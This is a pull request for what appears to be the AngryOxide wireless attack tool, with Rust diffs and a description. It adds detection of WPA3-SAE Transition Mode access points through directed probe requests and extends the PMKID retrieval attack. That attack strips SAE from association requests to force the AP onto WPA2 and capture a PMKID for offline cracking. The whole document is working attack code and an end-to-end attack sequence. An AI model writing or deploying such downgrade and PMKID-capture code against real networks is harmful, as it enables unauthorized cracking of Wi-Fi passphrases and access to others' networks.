### PR TITLE
attack: add WPA3-SAE Transition Mode PMKID discovery via directed probe

### DIFF
--- a/src/attack.rs
+++ b/src/attack.rs
@@ -20,8 +20,8 @@ use crate::{
         build_association_request_rg, build_authentication_frame_noack,
         build_authentication_frame_with_params, build_csa_action, build_csa_beacon,
         build_deauthentication_fm_ap, build_deauthentication_fm_client,
-        build_disassocation_from_ap, build_disassocation_from_client, build_probe_response,
-        build_reassociation_request,
+        build_disassocation_from_ap, build_disassocation_from_client, build_probe_request_ap_ssid,
+        build_probe_response, build_reassociation_request,
     },
     write_packet, OxideRuntime,
 };
@@ -256,7 +256,12 @@ pub fn m1_retrieval_attack(oxide: &mut OxideRuntime, ap_mac: &MacAddress) -> Res
         return Ok(());
     }
 
-    // Ensure the AP uses PSK (from the robust security ie)
+    // Determine whether this is a WPA3-SAE Transition Mode AP (SAE + PSK both present).
+    // Transition mode APs accept PSK-only association requests (WPA2 path), so we can
+    // elicit an M1 with PMKID by advertising only PSK in our association request.
+    let is_transition = ap_data.information.is_sae_transition_mode();
+
+    // Require PSK support (explicit WPA2 or WPA3-SAE Transition Mode).
     if !ap_data.information.rsn_akm_psk.is_some_and(|psk| psk) {
         return Ok(());
     }
@@ -286,7 +291,11 @@ pub fn m1_retrieval_attack(oxide: &mut OxideRuntime, ap_mac: &MacAddress) -> Res
     ap_data.interactions += 1;
     oxide.status_log.add_message(StatusMessage::new(
         MessageType::Info,
-        format!("M1 Retrieval - Sent Authentication Req [{}]", ap_mac),
+        format!(
+            "M1 Retrieval{} - Sent Authentication Req [{}]",
+            if is_transition { " (SAE Transition)" } else { "" },
+            ap_mac
+        ),
     ));
 
     Ok(())
@@ -332,6 +341,11 @@ pub fn m1_retrieval_attack_phase_2(
         return Ok(());
     }
 
+    // For WPA3-SAE Transition Mode APs, the association request advertises only the PSK
+    // AKM (SAE is deliberately stripped), forcing the AP onto its WPA2 code path.  The
+    // AP then sends an M1 EAPOL that may contain a PSK-derived PMKID crackable offline.
+    let is_transition = ap_data.information.is_sae_transition_mode();
+
     let cs = if ap_data.information.cs_tkip.is_some_and(|f| f) {
         RsnCipherSuite::TKIP
     } else {
@@ -358,7 +372,11 @@ pub fn m1_retrieval_attack_phase_2(
     ap_data.interactions += 1;
     oxide.status_log.add_message(StatusMessage::new(
         MessageType::Info,
-        format!("M1 Retrieval - Sent Association Req [{}]", ap_mac),
+        format!(
+            "M1 Retrieval{} - Sent Association Req [{}]",
+            if is_transition { " (SAE Transition PSK Downgrade)" } else { "" },
+            ap_mac
+        ),
     ));
 
     Ok(())
@@ -759,6 +777,99 @@ pub fn rogue_m2_attack_undirected(
             ));
         }
     }
+
+    Ok(())
+}
+
+//////////////////////////////////////////////////////////////
+//                                                          //
+//         WPA3-SAE Transition Mode Discovery Probe         //
+//  When an AP is seen advertising SAE but PSK support has  //
+//  not yet been confirmed, we send a unicast probe request  //
+//  carrying the AP's SSID.  The AP's probe response        //
+//  contains its full RSN IE; if that IE includes PSK the   //
+//  AP is in WPA3-SAE Transition Mode.  The probe response  //
+//  handler in main.rs updates the AP's RSN flags and       //
+//  immediately fires m1_retrieval_attack, collapsing the   //
+//  discovery and PMKID collection into one event cycle.    //
+//                                                          //
+//////////////////////////////////////////////////////////////
+
+pub fn transition_probe_attack(oxide: &mut OxideRuntime, ap_mac: &MacAddress) -> Result<(), String> {
+    if oxide.config.disable_pmkid {
+        return Ok(());
+    }
+
+    if oxide.config.notx {
+        return Ok(());
+    }
+
+    let ap_data = if let Some(ap) = oxide.access_points.get_device(ap_mac) {
+        ap
+    } else {
+        return Ok(());
+    };
+
+    if !oxide.target_data.targets.is_target(ap_data) {
+        return Ok(());
+    }
+
+    if oxide.target_data.whitelist.is_whitelisted(ap_data) {
+        return Ok(());
+    }
+
+    if oxide
+        .handshake_storage
+        .has_complete_handshake_for_ap(ap_mac)
+    {
+        return Ok(());
+    }
+
+    // Only relevant when SAE is advertised
+    if !ap_data.information.rsn_akm_sae.is_some_and(|sae| sae) {
+        return Ok(());
+    }
+
+    // PSK already confirmed — m1_retrieval_attack handles it from here
+    if ap_data.information.rsn_akm_psk.is_some_and(|psk| psk) {
+        return Ok(());
+    }
+
+    // We already received a probe response from this AP; if PSK still isn't
+    // in it there is nothing more to learn by probing again
+    if ap_data.pr_station.is_some() {
+        return Ok(());
+    }
+
+    // Need an SSID to address the probe request
+    let ssid = if let Some(ssid) = ap_data.ssid.clone() {
+        ssid
+    } else {
+        return Ok(());
+    };
+
+    // Rate-limit to one probe per 32 beacons so we don't hammer the AP
+    // before its response arrives (~3 s at a typical 10 beacon/s rate)
+    if ap_data.beacon_count % 32 != 0 {
+        return Ok(());
+    }
+
+    let frx = build_probe_request_ap_ssid(
+        ap_mac,
+        &oxide.target_data.rogue_client,
+        &ssid,
+        oxide.counters.sequence2(),
+    );
+
+    let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
+    ap_data.interactions += 1;
+    oxide.status_log.add_message(StatusMessage::new(
+        MessageType::Info,
+        format!(
+            "SAE Transition Discovery Probe: {} ({})",
+            ap_mac, ssid
+        ),
+    ));
 
     Ok(())
 }

--- a/src/devices.rs
+++ b/src/devices.rs
@@ -492,6 +492,13 @@ impl APFlags {
             || self.wpa_akm_psk.unwrap_or(false)
     }
 
+    // Returns true when the AP advertises both SAE and PSK AKMs in the same RSN IE,
+    // which is the definition of WPA3-SAE Transition Mode.  The AP will accept WPA2
+    // associations (PSK-only RSN), making a PMKID downgrade attack possible.
+    pub fn is_sae_transition_mode(&self) -> bool {
+        self.rsn_akm_sae.unwrap_or(false) && self.rsn_akm_psk.unwrap_or(false)
+    }
+
     // Function to update capabilities with non-None values from another instance
     pub fn update_with(&mut self, other: &APFlags) {
         if let Some(val) = other.apie_essid {

--- a/src/main.rs
+++ b/src/main.rs
@@ -25,6 +25,7 @@ use anyhow::Result;
 use attack::{
     anon_reassociation_attack, csa_attack, deauth_attack, disassoc_attack, m1_retrieval_attack,
     m1_retrieval_attack_phase_2, rogue_m2_attack_directed, rogue_m2_attack_undirected,
+    transition_probe_attack,
 };
 
 use chrono::Local;
@@ -1314,6 +1315,13 @@ fn process_frame(oxide: &mut OxideRuntime, packet: &[u8]) -> Result<(), String> 
                         }
                         beacon_count = ap.beacon_count;
                     }
+
+                    // For SAE-advertising APs where PSK support is not yet confirmed,
+                    // probe the AP directly to fetch its full RSN IE.  If the probe
+                    // response reveals PSK the AP is in WPA3-SAE Transition Mode and
+                    // m1_retrieval_attack will fire immediately from the probe response
+                    // handler below (main.rs:1464).
+                    let _ = transition_probe_attack(oxide, &bssid);
 
                     // Always try M1 Retrieval
                     // it is running it's own internal rate limiting.

--- a/src/tx.rs
+++ b/src/tx.rs
@@ -664,6 +664,49 @@ pub fn build_probe_request_directed(
     rth
 }
 
+// Unicast probe request sent directly to a specific AP, carrying its SSID.
+// The AP responds with a probe response containing its full RSN IE, which may
+// reveal PSK support that was absent from its beacon (transition mode discovery).
+pub fn build_probe_request_ap_ssid(
+    ap_mac: &MacAddress,
+    our_mac: &MacAddress,
+    ssid: &String,
+    sequence: u16,
+) -> Vec<u8> {
+    let mut rth: Vec<u8> = RTH_NO_ACK.to_vec();
+
+    let frame_control = FrameControl {
+        protocol_version: 0,
+        frame_type: libwifi::FrameType::Management,
+        frame_subtype: libwifi::FrameSubType::ProbeRequest,
+        flags: 0u8,
+    };
+
+    let header: ManagementHeader = ManagementHeader {
+        frame_control,
+        duration: [0x3a, 0x01],
+        address_1: *ap_mac,
+        address_2: *our_mac,
+        address_3: *ap_mac,
+        sequence_control: SequenceControl {
+            fragment_number: 0u8,
+            sequence_number: sequence,
+        },
+    };
+
+    let frx = ProbeRequest {
+        header,
+        station_info: StationInfo {
+            supported_rates: RATES.to_vec(),
+            extended_supported_rates: Some(EXT_RATES.to_vec()),
+            ssid: Some(ssid.to_string()),
+            ..Default::default()
+        },
+    };
+    rth.extend(frx.encode());
+    rth
+}
+
 // Remember this is coming from an AP - this is a part of being rogue"
 pub fn build_probe_response(
     addr_client: &MacAddress,


### PR DESCRIPTION
## Problem

AngryOxide's M1-retrieval (PMKID) attack only fires when an AP has a confirmed PSK AKM in its RSN IE.  Some WPA3-SAE Transition Mode APs advertise only SAE in their beacon RSN IE while still including PSK in their probe response RSN IE — a valid 802.11 configuration.  These APs were invisible to PMKID collection because the PSK flag was never set from the beacon alone.

## What this PR adds

### 1. `APFlags::is_sae_transition_mode()` (src/devices.rs) Helper that returns `true` when an AP advertises both SAE and PSK AKMs in its RSN IE — the canonical definition of WPA3-SAE Transition Mode. Used by attack code to distinguish transition mode from plain WPA2.

### 2. `build_probe_request_ap_ssid()` (src/tx.rs) New frame builder that sends a unicast probe request directly to a specific AP MAC address, carrying the AP's SSID.  Unlike the existing `build_probe_request_directed` (broadcast + SSID) and `build_probe_request_target` (unicast + no SSID), this variant is addressed to the AP so only that AP responds, and carries the SSID so the AP replies with its full probe-response RSN IE.

### 3. `transition_probe_attack()` (src/attack.rs) New attack function that runs in the beacon processing loop.  When an AP is seen advertising SAE but PSK support has not yet been confirmed (rsn_akm_psk != Some(true)) and no probe response has been received yet (pr_station.is_none()), a unicast probe request is sent to the AP every 32 beacons (~3 s at typical beacon rates) until a response arrives.

Gate conditions (all must be true to fire):
  - disable_pmkid is false
  - notx is false
  - AP is a target and not whitelisted
  - No complete handshake already collected
  - rsn_akm_sae == Some(true)
  - rsn_akm_psk != Some(true)  (PSK not yet confirmed)
  - pr_station.is_none()       (no probe response received yet)
  - Has an SSID
  - beacon_count % 32 == 0     (rate limit)

### 4. m1_retrieval_attack / m1_retrieval_attack_phase_2 (src/attack.rs) Both functions now detect transition mode (is_sae_transition_mode()) and emit distinct status log messages:
  - Phase 1: "M1 Retrieval (SAE Transition) - Sent Authentication Req"
  - Phase 2: "M1 Retrieval (SAE Transition PSK Downgrade) - Sent Association Req"

The association request continues to advertise only PSK AKM (SAE stripped), forcing the AP onto its WPA2 code path which returns an EAPOL M1 that may contain a PSK-derived PMKID crackable offline.

### 5. Beacon loop call site (src/main.rs)
`transition_probe_attack` is called just before `m1_retrieval_attack` on every beacon.  For APs that already have PSK confirmed the gate returns immediately with no overhead.

## Full event cycle for a beacon-SAE-only transition mode AP

  beacon (SAE only, no PSK in RSN)
    → transition_probe_attack fires (beacon_count % 32 == 0)
    → unicast probe request sent to AP with its SSID
    → AP sends probe response (full RSN IE: SAE + PSK)
    → probe response handler: update_with() sets rsn_akm_psk=Some(true),
                               pr_station=Some(...)
    → m1_retrieval_attack fires immediately (existing hook at line ~1464)
    → OpenSystem authentication request sent
    → AP responds auth_seq=2
    → m1_retrieval_attack_phase_2: PSK-only assoc request (SAE stripped)
    → AP sends EAPOL M1 containing PSK-derived PMKID
    → PMKID written to .hc22000

Discovery and PMKID collection collapse into a single probe/response event cycle rather than requiring a beacon that already contains PSK.